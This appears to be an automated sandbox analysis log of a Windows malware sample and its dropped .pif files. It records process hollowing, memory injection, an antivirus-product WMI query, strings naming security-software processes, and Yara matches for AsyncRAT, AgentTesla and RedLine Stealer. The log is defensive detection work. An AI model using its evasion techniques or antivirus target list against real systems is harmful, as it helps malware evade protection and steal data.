Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Memory allocated: C:\Users\Public\Libraries\vokleakA.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Memory allocated: C:\Users\Public\Libraries\vokleakA.pif base: 18130000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Memory allocated: C:\Users\Public\Libraries\vokleakA.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Memory allocated: C:\Users\Public\Libraries\vokleakA.pif base: 121D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Memory allocated: C:\Users\Public\Libraries\vokleakA.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Memory allocated: C:\Users\Public\Libraries\vokleakA.pif base: 18130000 protect: page execute and read and write	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section unmapped: C:\Users\Public\Libraries\vokleakA.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section unmapped: C:\Users\Public\Libraries\vokleakA.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section unmapped: C:\Users\Public\Libraries\vokleakA.pif base address: 400000	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Memory written: C:\Users\Public\Libraries\vokleakA.pif base: 21F008	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Memory written: C:\Users\Public\Libraries\vokleakA.pif base: 29D008	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Memory written: C:\Users\Public\Libraries\vokleakA.pif base: 338008	Jump to behavior

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Process created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Process created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Process created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pif	Jump to behavior

Source: vokleakA.pif, 00000004.00000002.3232986846.00000000320EA000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232986846.0000000032065000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232986846.000000003210A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\]q
Source: vokleakA.pif, 00000004.00000002.3232986846.00000000320EA000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232986846.0000000032065000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2071952429.0000000034562000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: vokleakA.pif, 00000004.00000002.3232986846.0000000032065000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232986846.000000003210A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\]q%
Source: vokleakA.pif, 00000004.00000002.3232986846.0000000032065000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe]qp
Source: vokleakA.pif, 00000004.00000002.3232986846.0000000032065000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe]qP
Source: vokleakA.pif, 00000004.00000002.3232986846.000000003210A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe]q
Source: vokleakA.pif, 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager`,]q

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_04105DDC
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_04105EE8
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: GetLocaleInfoA,	0_2_0410B8C4
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: GetLocaleInfoA,	0_2_0410B910
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: GetLocaleInfoA,	4_2_00417A20
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: GetLocaleInfoA,	4_1_00417A20
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	5_2_04075DDC
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	5_2_04075EE7
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: GetLocaleInfoA,	5_2_0407B910
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: GetLocaleInfoA,	7_2_00417A20
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: GetLocaleInfoA,	7_1_00417A20
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: GetLocaleInfoA,	9_2_00417A20
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: GetLocaleInfoA,	9_1_00417A20

Source: C:\Users\Public\Libraries\vokleakA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\vokleakA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_0410A30C GetLocalTime,

0_2_0410A30C

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_041695F8 GetVersion,

0_2_041695F8

Source: C:\Users\Public\Libraries\vokleakA.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR

Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: cmdagent.exe
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: quhlpsvc.exe
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: avgamsvr.exe
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: TMBMSRV.exe
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: Vsserv.exe
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: avgupsvc.exe
Source: vokleakA.pif, 00000004.00000002.3235072816.0000000034540000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3229902141.000000002FF7B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: avgemc.exe
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\Public\Libraries\vokleakA.pif

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: 4.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2300614392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2300614392.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2300614392.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2149766444.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000001.2234454714.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000001.2001615999.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2200611596.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000001.2001615999.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3207967153.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
